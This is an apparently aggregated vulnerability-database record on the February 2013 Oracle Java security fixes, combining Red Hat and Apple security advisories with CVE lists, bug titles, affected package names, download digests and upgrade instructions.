906935 - CVE-2013-0438 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
907190 - CVE-2013-1479 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (JavaFX)
907207 - CVE-2013-0428 OpenJDK: reflection API incorrect checks for proxy classes (Libraries, 7197546, SE-2012-01 Issue 29)
907218 - CVE-2013-0444 OpenJDK: MethodFinder insufficient checks for cached results (Beans, 7200493)
907219 - CVE-2013-0432 OpenJDK: insufficient clipboard access premission checks (AWT, 7186952)
907222 - CVE-2013-0437 Oracle JDK: unspecified vulnerability fixed in 7u13 (2D)
907223 - CVE-2012-3213 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Scripting)
907226 - CVE-2013-0409 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (JMX)
907340 - CVE-2013-0443 OpenJDK: insufficient Diffie-Hellman public key checks (JSSE, 7192392)
907344 - CVE-2013-0425 OpenJDK: logging insufficient access control checks (Libraries, 6664509)
907346 - CVE-2013-0426 OpenJDK: logging insufficient access control checks (Libraries, 6664528)
907453 - CVE-2013-0434 OpenJDK: loadPropertyFile missing restrictions (JAXP, 8001235)
907455 - CVE-2013-0427 OpenJDK: invalid threads subject to interrupts (Libraries, 6776941)
907456 - CVE-2013-0433 OpenJDK: InetSocketAddress serialization issue (Networking, 7201071)
907457 - CVE-2013-1476 OpenJDK: missing ValueHandlerImpl class constructor access restriction (CORBA, 8000631)
907458 - CVE-2013-0441 OpenJDK: missing serialization restriction (CORBA, 7201066)
907460 - CVE-2013-0429 OpenJDK: PresentationManager incorrectly shared (CORBA, 7141694)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
java-1.7.0-oracle-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.1.el5_9.i386.rpm
x86_64:
java-1.7.0-oracle-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
java-1.7.0-oracle-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.1.el5_9.i386.rpm
x86_64:
java-1.7.0-oracle-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
java-1.7.0-oracle-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.3.el6_3.i686.rpm
x86_64:
java-1.7.0-oracle-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
Red Hat Enterprise Linux HPC Node Supplementary (v. 6):
x86_64:
java-1.7.0-oracle-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
java-1.7.0-oracle-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.3.el6_3.i686.rpm
x86_64:
java-1.7.0-oracle-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
java-1.7.0-oracle-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.3.el6_3.i686.rpm
x86_64:
java-1.7.0-oracle-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2012-1541.html
https://www.redhat.com/security/data/cve/CVE-2012-3213.html
https://www.redhat.com/security/data/cve/CVE-2012-3342.html
https://www.redhat.com/security/data/cve/CVE-2013-0351.html
https://www.redhat.com/security/data/cve/CVE-2013-0409.html
https://www.redhat.com/security/data/cve/CVE-2013-0419.html
https://www.redhat.com/security/data/cve/CVE-2013-0423.html
https://www.redhat.com/security/data/cve/CVE-2013-0424.html
https://www.redhat.com/security/data/cve/CVE-2013-0425.html
https://www.redhat.com/security/data/cve/CVE-2013-0426.html
https://www.redhat.com/security/data/cve/CVE-2013-0427.html
https://www.redhat.com/security/data/cve/CVE-2013-0428.html
https://www.redhat.com/security/data/cve/CVE-2013-0429.html
https://www.redhat.com/security/data/cve/CVE-2013-0430.html
https://www.redhat.com/security/data/cve/CVE-2013-0431.html
https://www.redhat.com/security/data/cve/CVE-2013-0432.html
https://www.redhat.com/security/data/cve/CVE-2013-0433.html
https://www.redhat.com/security/data/cve/CVE-2013-0434.html
https://www.redhat.com/security/data/cve/CVE-2013-0435.html
https://www.redhat.com/security/data/cve/CVE-2013-0437.html
https://www.redhat.com/security/data/cve/CVE-2013-0438.html
https://www.redhat.com/security/data/cve/CVE-2013-0440.html
https://www.redhat.com/security/data/cve/CVE-2013-0441.html
https://www.redhat.com/security/data/cve/CVE-2013-0442.html
https://www.redhat.com/security/data/cve/CVE-2013-0443.html
https://www.redhat.com/security/data/cve/CVE-2013-0444.html
https://www.redhat.com/security/data/cve/CVE-2013-0445.html
https://www.redhat.com/security/data/cve/CVE-2013-0446.html
https://www.redhat.com/security/data/cve/CVE-2013-0448.html
https://www.redhat.com/security/data/cve/CVE-2013-0449.html
https://www.redhat.com/security/data/cve/CVE-2013-0450.html
https://www.redhat.com/security/data/cve/CVE-2013-1473.html
https://www.redhat.com/security/data/cve/CVE-2013-1475.html
https://www.redhat.com/security/data/cve/CVE-2013-1476.html
https://www.redhat.com/security/data/cve/CVE-2013-1478.html
https://www.redhat.com/security/data/cve/CVE-2013-1479.html
https://www.redhat.com/security/data/cve/CVE-2013-1480.html
https://www.redhat.com/security/data/cve/CVE-2013-1489.html
https://access.redhat.com/security/updates/classification/#critical
http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2013 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFREE70XlSAg2UNWIIRAl0aAJ9geHwpDX2Kb2LdBP3WSQxnPNr97gCgmyRY
c2rbNUSIrrFwoG5d602o5QY=
=Kt+4
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201302-0136 | CVE-2013-0423 | Oracle Java contains multiple vulnerabilities |
CVSS V2: 7.6 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11 and 6 through Update 38 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than other CVEs listed in the February 2013 CPU. Java 7 Update 11, Java 6 Update 38, and earlier versions of Java contain vulnerabilities that can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. This vulnerability February 2013 CPU This is a different vulnerability than the other vulnerabilities listed on the list.Information is obtained by a third party, information is altered, or service operation is interrupted. (DoS) An attack may be carried out.
The vulnerability can be exploited over multiple protocols. This issue affects the 'Deployment' sub-component.
This vulnerability affects the following supported versions:
7 Update 11 and prior, 6 Update 38 and prior, 5.0 Update 38 and prior
Note: This issue was previously discussed in BID 57670 (Oracle Java Runtime Environment Multiple Security Vulnerabilities) but has been given its own record to better document it. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2013-02-19-1 Java for OS X 2013-001 and Mac OS X v10.6
Update 13
Java for OS X 2013-001 and Mac OS X v10.6 Update 13 is now available
and addresses the following:
Java
Available for: OS X Lion v10.7 or later,
OS X Lion Server v10.7 or later, OS X Mountain Lion 10.8 or later
Impact: Multiple vulnerabilities in Java 1.6.0_37
Description: Multiple vulnerabilities existed in Java 1.6.0_37, the
most serious of which may allow an untrusted Java applet to execute
arbitrary code outside the Java sandbox. Visiting a web page
containing a maliciously crafted untrusted Java applet may lead to
arbitrary code execution with the privileges of the current user. For
Mac OS X v10.6 systems, these issues were addressed in Java for Mac
OS X v10.6 Update 13. Further information is available via the Java
website at http://www.oracle.com/technetwork/java/javase/
releasenotes-136954.html
CVE-ID
CVE-2012-3213
CVE-2012-3342
CVE-2013-0351
CVE-2013-0409
CVE-2013-0419
CVE-2013-0423
CVE-2013-0424
CVE-2013-0425
CVE-2013-0426
CVE-2013-0427
CVE-2013-0428
CVE-2013-0429
CVE-2013-0432
CVE-2013-0433
CVE-2013-0434
CVE-2013-0435
CVE-2013-0438
CVE-2013-0440
CVE-2013-0441
CVE-2013-0442
CVE-2013-0443
CVE-2013-0445
CVE-2013-0446
CVE-2013-0450
CVE-2013-1473
CVE-2013-1475
CVE-2013-1476
CVE-2013-1478
CVE-2013-1480
CVE-2013-1481
Java
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 or later, OS X Lion Server v10.7 or later,
OS X Mountain Lion 10.8 or later
Impact: Multiple vulnerabilities in Java
Description: Multiple vulnerabilities existed in Java, the most
serious of which may allow an untrusted Java applet to execute
arbitrary code outside the Java sandbox. Visiting a web page
containing a maliciously crafted untrusted Java applet may lead to
arbitrary code execution with the privileges of the current user.
Further information is available via the Java website at http://www.o
racle.com/technetwork/java/javase/releasenotes-136954.html
CVE-ID
CVE-2013-1486
CVE-2013-1487
CVE-2013-1488
Malware removal
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 or later, OS X Lion Server v10.7 or later,
OS X Mountain Lion 10.8 or later
Description: This update runs a malware removal tool that will
remove the most common variants of malware. If malware is found, it
presents a dialog notifying the user that malware was removed. There
is no indication to the user if malware is not found.
Java for OS X 2013-001 and Java for Mac OS X 10.6 Update 13
may be obtained from the Software Update pane in System Preferences,
Mac App Store, or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/
For Mac OS X v10.6 systems
The download file is named: JavaForMacOSX10.6.Update13.dmg
Its SHA-1 digest is: 5327984bc0b300c237fe69cecf69513624f56b0e
For OS X Lion and Mountain Lion systems
The download file is named: JavaForOSX2013-001.dmg
Its SHA-1 digest is: 145d74354241cf2f567d2768bbd0a7185e7d308a
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJRI/A/AAoJEPefwLHPlZEwDp4QAKz9nfo397KaudpFDey26bsb
GNR8HQ3Z5Ln0ArgwBcc2XabzIYXsjmY7nPdZgq1m0sWgFGWtfQ7qslRooUyNLOsB
WUddu+hQYvPn3CJOZsaPfTA2mfK6Qk9LeyqzUUkZrRNltHnIFMO7uXLEIdrFdnnx
exFMPjbIq+xM5UZgvd/2grtF4DaZHnbcK+t/tDwH09/hGRQ+l+3a/3FB2S1Av85c
FSuiieyrz2NNnDwFCj5NeSFQuK7hr52TiSOEPYI2eiTepyBHrUy03wAe8uwIzQII
RjkY3Nbc8AZt0Q6lq5TgsQbH+vrwVE07nty36uMKmE2vJXyOAIZjfrrwv9SetLwd
QnU5NYMbeHAHmSN5JQfuvDxEfL15/7Jafw2noJGotdrMzs6XQACFIHKqLORdwNkp
sltj3LwykpcyoCR8Dq7NPafqhp2wySaHX8DFSohcq1aa1w+SLDgPCZUAzknwokCL
f/hVQzP6hD0uHP/2jsLjh5g6TgHmCRdR+CKCs7QZaYAUketelRX9YOcgcXzqf5sy
EcbDvJ+rd3KsQ9gIByGwVhHD87NSZDJAyG0ROjMMS9w/7l7nhGxedzGzlyK3oNl/
VpewgZ8FpUrvY80HOPz5XyFmX+HQoSnJ8er6OI5AvHBPn+Z1yHDLS5zpLeDD/wO9
rmbzMJjZUnlCDXoLEVQ9
=qlVo
-----END PGP SIGNATURE-----
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Low: Red Hat Network Satellite server IBM Java Runtime security update
Advisory ID: RHSA-2013:1455-01
Product: Red Hat Satellite
Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-1455.html
Issue date: 2013-10-23
CVE Names: CVE-2011-0802 CVE-2011-0814 CVE-2011-0862
CVE-2011-0863 CVE-2011-0865 CVE-2011-0867
CVE-2011-0868 CVE-2011-0869 CVE-2011-0871
CVE-2011-0873 CVE-2011-3389 CVE-2011-3516
CVE-2011-3521 CVE-2011-3544 CVE-2011-3545
CVE-2011-3546 CVE-2011-3547 CVE-2011-3548
CVE-2011-3549 CVE-2011-3550 CVE-2011-3551
CVE-2011-3552 CVE-2011-3553 CVE-2011-3554
CVE-2011-3556 CVE-2011-3557 CVE-2011-3560
CVE-2011-3561 CVE-2011-3563 CVE-2011-5035
CVE-2012-0497 CVE-2012-0498 CVE-2012-0499
CVE-2012-0500 CVE-2012-0501 CVE-2012-0502
CVE-2012-0503 CVE-2012-0505 CVE-2012-0506
CVE-2012-0507 CVE-2012-0547 CVE-2012-0551
CVE-2012-1531 CVE-2012-1532 CVE-2012-1533
CVE-2012-1541 CVE-2012-1682 CVE-2012-1713
CVE-2012-1716 CVE-2012-1717 CVE-2012-1718
CVE-2012-1719 CVE-2012-1721 CVE-2012-1722
CVE-2012-1725 CVE-2012-3143 CVE-2012-3159
CVE-2012-3213 CVE-2012-3216 CVE-2012-3342
CVE-2012-4820 CVE-2012-4822 CVE-2012-4823
CVE-2012-5068 CVE-2012-5069 CVE-2012-5071
CVE-2012-5072 CVE-2012-5073 CVE-2012-5075
CVE-2012-5079 CVE-2012-5081 CVE-2012-5083
CVE-2012-5084 CVE-2012-5089 CVE-2013-0169
CVE-2013-0351 CVE-2013-0401 CVE-2013-0409
CVE-2013-0419 CVE-2013-0423 CVE-2013-0424
CVE-2013-0425 CVE-2013-0426 CVE-2013-0427
CVE-2013-0428 CVE-2013-0432 CVE-2013-0433
CVE-2013-0434 CVE-2013-0435 CVE-2013-0438
CVE-2013-0440 CVE-2013-0441 CVE-2013-0442
CVE-2013-0443 CVE-2013-0445 CVE-2013-0446
CVE-2013-0450 CVE-2013-0809 CVE-2013-1473
CVE-2013-1476 CVE-2013-1478 CVE-2013-1480
CVE-2013-1481 CVE-2013-1486 CVE-2013-1487
CVE-2013-1491 CVE-2013-1493 CVE-2013-1500
CVE-2013-1537 CVE-2013-1540 CVE-2013-1557
CVE-2013-1563 CVE-2013-1569 CVE-2013-1571
CVE-2013-2383 CVE-2013-2384 CVE-2013-2394
CVE-2013-2407 CVE-2013-2412 CVE-2013-2417
CVE-2013-2418 CVE-2013-2419 CVE-2013-2420
CVE-2013-2422 CVE-2013-2424 CVE-2013-2429
CVE-2013-2430 CVE-2013-2432 CVE-2013-2433
CVE-2013-2435 CVE-2013-2437 CVE-2013-2440
CVE-2013-2442 CVE-2013-2443 CVE-2013-2444
CVE-2013-2446 CVE-2013-2447 CVE-2013-2448
CVE-2013-2450 CVE-2013-2451 CVE-2013-2452
CVE-2013-2453 CVE-2013-2454 CVE-2013-2455
CVE-2013-2456 CVE-2013-2457 CVE-2013-2459
CVE-2013-2463 CVE-2013-2464 CVE-2013-2465
CVE-2013-2466 CVE-2013-2468 CVE-2013-2469
CVE-2013-2470 CVE-2013-2471 CVE-2013-2472
CVE-2013-2473 CVE-2013-3743
=====================================================================
1. Summary:
Updated java-1.6.0-ibm packages that fix several security issues are now
available for Red Hat Network Satellite Server 5.4.
The Red Hat Security Response Team has rated this update as having low
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Satellite 5.4 (RHEL v.5) - i386, s390x, x86_64
Red Hat Satellite 5.4 (RHEL v.6) - s390x, x86_64
3. Description:
This update corrects several security vulnerabilities in the IBM Java
Runtime Environment shipped as part of Red Hat Network Satellite Server
5.4. In a typical operating environment, these are of low security risk as
the runtime is not used on untrusted applets.
(CVE-2011-0802, CVE-2011-0814, CVE-2011-0862, CVE-2011-0863, CVE-2011-0865,
CVE-2011-0867, CVE-2011-0868, CVE-2011-0869, CVE-2011-0871, CVE-2011-0873,
CVE-2011-3389, CVE-2011-3516, CVE-2011-3521, CVE-2011-3544, CVE-2011-3545,
CVE-2011-3546, CVE-2011-3547, CVE-2011-3548, CVE-2011-3549, CVE-2011-3550,
CVE-2011-3551, CVE-2011-3552, CVE-2011-3553, CVE-2011-3554, CVE-2011-3556,
CVE-2011-3557, CVE-2011-3560, CVE-2011-3561, CVE-2011-3563, CVE-2011-5035,
CVE-2012-0497, CVE-2012-0498, CVE-2012-0499, CVE-2012-0500, CVE-2012-0501,
CVE-2012-0502, CVE-2012-0503, CVE-2012-0505, CVE-2012-0506, CVE-2012-0507,
CVE-2012-0547, CVE-2012-0551, CVE-2012-1531, CVE-2012-1532, CVE-2012-1533,
CVE-2012-1541, CVE-2012-1682, CVE-2012-1713, CVE-2012-1716, CVE-2012-1717,
CVE-2012-1718, CVE-2012-1719, CVE-2012-1721, CVE-2012-1722, CVE-2012-1725,
CVE-2012-3143, CVE-2012-3159, CVE-2012-3213, CVE-2012-3216, CVE-2012-3342,
CVE-2012-4820, CVE-2012-4822, CVE-2012-4823, CVE-2012-5068, CVE-2012-5069,
CVE-2012-5071, CVE-2012-5072, CVE-2012-5073, CVE-2012-5075, CVE-2012-5079,
CVE-2012-5081, CVE-2012-5083, CVE-2012-5084, CVE-2012-5089, CVE-2013-0169,
CVE-2013-0351, CVE-2013-0401, CVE-2013-0409, CVE-2013-0419, CVE-2013-0423,
CVE-2013-0424, CVE-2013-0425, CVE-2013-0426, CVE-2013-0427, CVE-2013-0428,
CVE-2013-0432, CVE-2013-0433, CVE-2013-0434, CVE-2013-0435, CVE-2013-0438,
CVE-2013-0440, CVE-2013-0441, CVE-2013-0442, CVE-2013-0443, CVE-2013-0445,
CVE-2013-0446, CVE-2013-0450, CVE-2013-0809, CVE-2013-1473, CVE-2013-1476,
CVE-2013-1478, CVE-2013-1480, CVE-2013-1481, CVE-2013-1486, CVE-2013-1487,
CVE-2013-1491, CVE-2013-1493, CVE-2013-1500, CVE-2013-1537, CVE-2013-1540,
CVE-2013-1557, CVE-2013-1563, CVE-2013-1569, CVE-2013-1571, CVE-2013-2383,
CVE-2013-2384, CVE-2013-2394, CVE-2013-2407, CVE-2013-2412, CVE-2013-2417,
CVE-2013-2418, CVE-2013-2419, CVE-2013-2420, CVE-2013-2422, CVE-2013-2424,
CVE-2013-2429, CVE-2013-2430, CVE-2013-2432, CVE-2013-2433, CVE-2013-2435,
CVE-2013-2437, CVE-2013-2440, CVE-2013-2442, CVE-2013-2443, CVE-2013-2444,
CVE-2013-2446, CVE-2013-2447, CVE-2013-2448, CVE-2013-2450, CVE-2013-2451,
CVE-2013-2452, CVE-2013-2453, CVE-2013-2454, CVE-2013-2455, CVE-2013-2456,
CVE-2013-2457, CVE-2013-2459, CVE-2013-2463, CVE-2013-2464, CVE-2013-2465,
CVE-2013-2466, CVE-2013-2468, CVE-2013-2469, CVE-2013-2470, CVE-2013-2471,
CVE-2013-2472, CVE-2013-2473, CVE-2013-3743)
Users of Red Hat Network Satellite Server 5.4 are advised to upgrade to
these updated packages, which contain the IBM Java SE 6 SR14 release. For
this update to take effect, Red Hat Network Satellite Server must be
restarted ("/usr/sbin/rhn-satellite restart"), as well as all running
instances of IBM Java.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at
https://access.redhat.com/site/articles/11258
5. Bugs fixed (http://bugzilla.redhat.com/):
706106 - CVE-2011-0865 OpenJDK: Deserialization allows creation of mutable SignedObject (Deserialization, 6618658)
706139 - CVE-2011-0862 OpenJDK: integer overflows in JPEGImageReader and font SunLayoutEngine (2D, 7013519)
706153 - CVE-2011-0867 OpenJDK: NetworkInterface information leak (Networking, 7013969)
706234 - CVE-2011-0869 OpenJDK: unprivileged proxy settings change via SOAPConnection (SAAJ, 7013971)
706241 - CVE-2011-0868 OpenJDK: incorrect numeric type conversion in TransformHelper (2D, 7016495)
706248 - CVE-2011-0871 OpenJDK: MediaTracker created Component instances with unnecessary privileges (Swing, 7020198)
711675 - CVE-2011-0873 Oracle/IBM JDK: unspecified vulnerability fixed in 6u26 (2D)
711676 - CVE-2011-0863 Oracle/IBM JDK: unspecified vulnerability fixed in 6u26 (Deployment)
711677 - CVE-2011-0802 CVE-2011-0814 Oracle/IBM JDK: unspecified vulnerabilities fixed in 6u26 (Sound)
737506 - CVE-2011-3389 HTTPS: block-wise chosen-plaintext attack against SSL/TLS (BEAST)
745379 - CVE-2011-3560 OpenJDK: missing checkSetFactory calls in HttpsURLConnection (JSSE, 7096936)
745387 - CVE-2011-3547 OpenJDK: InputStream skip() information leak (Networking/IO, 7000600)
745391 - CVE-2011-3551 OpenJDK: Java2D TransformHelper integer overflow (2D, 7023640)
745397 - CVE-2011-3552 OpenJDK: excessive default UDP socket limit under SecurityManager (Networking, 7032417)
745399 - CVE-2011-3544 OpenJDK: missing SecurityManager checks in scripting engine (Scripting, 7046823)
745442 - CVE-2011-3521 OpenJDK: IIOP deserialization code execution (Deserialization, 7055902)
745447 - CVE-2011-3554 OpenJDK: insufficient pack200 JAR files uncompress error checks (Runtime, 7057857)
745459 - CVE-2011-3556 OpenJDK: RMI DGC server remote code execution (RMI, 7077466)
745464 - CVE-2011-3557 OpenJDK: RMI registry privileged code execution (RMI, 7083012)
745473 - CVE-2011-3548 OpenJDK: mutable static AWTKeyStroke.ctor (AWT, 7019773)
745476 - CVE-2011-3553 OpenJDK: JAX-WS stack-traces information leak (JAX-WS, 7046794)
747191 - CVE-2011-3545 Oracle/IBM JDK: unspecified vulnerability fixed in 6u29 (Sound)
747198 - CVE-2011-3549 Oracle/IBM JDK: unspecified vulnerability fixed in 6u29 (Swing)
747200 - CVE-2011-3550 Oracle/IBM JDK: unspecified vulnerability fixed in 6u29 (AWT)
747203 - CVE-2011-3516 Oracle/IBM JDK: unspecified vulnerability fixed in 6u29 (Deployment)
747205 - CVE-2011-3546 Oracle/IBM JDK: unspecified vulnerability fixed in 6u29 (Deployment)
747208 - CVE-2011-3561 Oracle/IBM JDK: unspecified vulnerability fixed in 6u29 (Deployment)
788606 - CVE-2011-5035 OpenJDK: HttpServer no header count limit (Lightweight HTTP Server, 7126960)
788624 - CVE-2012-0501 OpenJDK: off-by-one bug in ZIP reading code (JRE, 7118283)
788976 - CVE-2012-0503 OpenJDK: unrestricted use of TimeZone.setDefault() (i18n, 7110687)
788994 - CVE-2012-0507 OpenJDK: AtomicReferenceArray insufficient array type check (Concurrency, 7082299)
789295 - CVE-2011-3563 OpenJDK: JavaSound incorrect bounds check (Sound, 7088367)
789297 - CVE-2012-0502 OpenJDK: KeyboardFocusManager focus stealing (AWT, 7110683)
789299 - CVE-2012-0505 OpenJDK: incomplete info in the deserialization exception (Serialization, 7110700)
789300 - CVE-2012-0506 OpenJDK: mutable repository identifiers (CORBA, 7110704)
789301 - CVE-2012-0497 OpenJDK: insufficient checking of the graphics rendering object (2D, 7112642)
790720 - CVE-2012-0498 Oracle JDK: unspecified vulnerability fixed in 6u31 and 7u3 (2D)
790722 - CVE-2012-0499 Oracle JDK: unspecified vulnerability fixed in 6u31 and 7u3 (2D)
790724 - CVE-2012-0500 Oracle JDK: unspecified vulnerability fixed in 6u31 and 7u3 (Deployment)
829358 - CVE-2012-1717 OpenJDK: insecure temporary file permissions (JRE, 7143606)
829360 - CVE-2012-1716 OpenJDK: SynthLookAndFeel application context bypass (Swing, 7143614)
829361 - CVE-2012-1713 OpenJDK: fontmanager layout lookup code memory corruption (2D, 7143617)
829371 - CVE-2012-1719 OpenJDK: mutable repository identifiers in generated stub code (CORBA, 7143851)
829372 - CVE-2012-1718 OpenJDK: CRL and certificate extensions handling improvements (Security, 7143872)
829376 - CVE-2012-1725 OpenJDK: insufficient invokespecial <init> verification (HotSpot, 7160757)
831353 - CVE-2012-1721 Oracle JDK: unspecified vulnerability fixed in 6u33 and 7u5 (Deployment)
831354 - CVE-2012-1722 Oracle JDK: unspecified vulnerability fixed in 6u33 and 7u5 (Deployment)
831355 - CVE-2012-0551 Oracle JDK: unspecified vulnerability fixed in 6u33 and 7u5 (Deployment)
853097 - CVE-2012-1682 OpenJDK: beans ClassFinder insufficient permission checks (beans, 7162476)
853228 - CVE-2012-0547 OpenJDK: AWT hardening fixes (AWT, 7163201)
859140 - CVE-2013-0440 OpenJDK: CPU consumption DoS via repeated SSL ClientHello packets (JSSE, 7192393)
865346 - CVE-2012-3216 OpenJDK: java.io.FilePermission information leak (Libraries, 6631398)
865348 - CVE-2012-5068 OpenJDK: RhinoScriptEngine security bypass (Scripting, 7143535)
865357 - CVE-2012-5073 OpenJDK: LogManager security bypass (Libraries, 7169884)
865363 - CVE-2012-5075 OpenJDK: RMIConnectionImpl information disclosure (JMX, 7169888)
865365 - CVE-2012-5072 OpenJDK: AccessController.doPrivilegedWithCombiner() information disclosure (Security, 7172522)
865370 - CVE-2012-5081 OpenJDK: JSSE denial of service (JSSE, 7186286)
865511 - CVE-2012-5084 OpenJDK: DefaultFormatter insufficient data validation (Swing, 7195194)
865514 - CVE-2012-5089 OpenJDK: RMIConnectionImpl insufficient access control checks (JMX, 7198296)
865519 - CVE-2012-5071 OpenJDK: DescriptorSupport insufficient package access checks (JMX, 7192975)
865531 - CVE-2012-5069 OpenJDK: Executors state handling issues (Concurrency, 7189103)
